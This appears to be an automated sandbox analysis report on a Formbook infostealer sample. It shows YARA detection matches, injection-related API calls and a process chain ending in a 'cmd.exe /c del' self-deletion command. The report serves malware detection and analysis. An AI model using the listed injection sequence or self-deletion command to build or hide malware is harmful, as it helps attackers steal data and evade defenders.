Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6848E 0_2_00C6848E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C76CDC 0_2_00C76CDC
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C640FE 0_2_00C640FE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C74088 0_2_00C74088
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C700B7 0_2_00C700B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C851C9 0_2_00C851C9
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C77153 0_2_00C77153
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C762CA 0_2_00C762CA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C632F7 0_2_00C632F7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C743BF 0_2_00C743BF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C8D440 0_2_00C8D440
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6F461 0_2_00C6F461
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6C426 0_2_00C6C426
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C777EF 0_2_00C777EF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C8D8EE 0_2_00C8D8EE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6286B 0_2_00C6286B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C919F4 0_2_00C919F4
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6E9B7 0_2_00C6E9B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C73E0B 0_2_00C73E0B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6EFE2 0_2_00C6EFE2
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C84F9A 0_2_00C84F9A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD0227 1_2_00BD0227
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01711D55 2_2_01711D55
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01640D20 2_2_01640D20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164F900 2_2_0164F900
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165D5E0 2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701002 2_2_01701002
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165841F 2_2_0165841F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B090 2_2_0165B090
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167EBB0 2_2_0167EBB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01666E30 2_2_01666E30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041DAE4 2_2_0041DAE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041E544 2_2_0041E544
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041ED4C 2_2_0041ED4C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00409E5B 2_2_00409E5B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00409E60 2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: String function: 00C7F5F0 appears 31 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: String function: 00C7EB78 appears 39 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: String function: 00C7EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: String function: 0164B150 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD043D GetTempFileNameW,NtSetInformationFile,NtWriteFile,CreateProcessInternalW,GetThreadContext,SetThreadContext,GetThreadContext, 1_2_00BD043D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD07DF NtOpenFile, 1_2_00BD07DF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk, 2_2_01689540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01689910
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016895D0 NtClose,LdrInitializeThunk, 2_2_016895D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016899A0 NtCreateSection,LdrInitializeThunk, 2_2_016899A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01689860
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689840 NtDelayExecution,LdrInitializeThunk, 2_2_01689840
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016898F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_016898F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01689710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016897A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_016897A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01689780
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01689660
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689A50 NtCreateFile,LdrInitializeThunk, 2_2_01689A50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689A20 NtResumeThread,LdrInitializeThunk, 2_2_01689A20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01689A00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016896E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_016896E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689560 NtWriteFile, 2_2_01689560
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689950 NtQueueApcThread, 2_2_01689950
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689520 NtWaitForSingleObject, 2_2_01689520
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0168AD30 NtSetContextThread, 2_2_0168AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016895F0 NtQueryInformationFile, 2_2_016895F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016899D0 NtCreateProcessEx, 2_2_016899D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0168B040 NtSuspendThread, 2_2_0168B040
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689820 NtEnumerateKey, 2_2_01689820
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016898A0 NtWriteVirtualMemory, 2_2_016898A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689760 NtOpenProcess, 2_2_01689760
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689770 NtSetInformationFile, 2_2_01689770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0168A770 NtOpenThread, 2_2_0168A770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689730 NtQueryVirtualMemory, 2_2_01689730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689B00 NtSetValueKey, 2_2_01689B00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0168A710 NtOpenProcessToken, 2_2_0168A710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689FE0 NtCreateMutant, 2_2_01689FE0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0168A3B0 NtGetContextThread, 2_2_0168A3B0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689670 NtQueryInformationProcess, 2_2_01689670
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689650 NtQueryValueKey, 2_2_01689650
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689610 NtEnumerateValueKey, 2_2_01689610
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689A10 NtQuerySection, 2_2_01689A10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016896D0 NtCreateKey, 2_2_016896D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689A80 NtOpenDirectoryObject, 2_2_01689A80
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A360 NtCreateFile, 2_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A410 NtReadFile, 2_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A490 NtClose, 2_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A540 NtAllocateVirtualMemory, 2_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A35A NtCreateFile, 2_2_0041A35A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A3B2 NtCreateFile, 2_2_0041A3B2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A40A NtReadFile, 2_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A48B NtClose, 2_2_0041A48B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041A53A NtAllocateVirtualMemory, 2_2_0041A53A
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00C66FAA
Source: F61A.tmp.1.dr Static PE information: No import functions for PE file found
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Section loaded: dxgidebug.dll
Source: F61A.tmp.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: F61A.tmp.1.dr Static PE information: Section .text
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe File read: C:\Users\user\Desktop\primosdv3.1.1.0.exe
Source: primosdv3.1.1.0.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\primosdv3.1.1.0.exe C:\Users\user\Desktop\primosdv3.1.1.0.exe
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
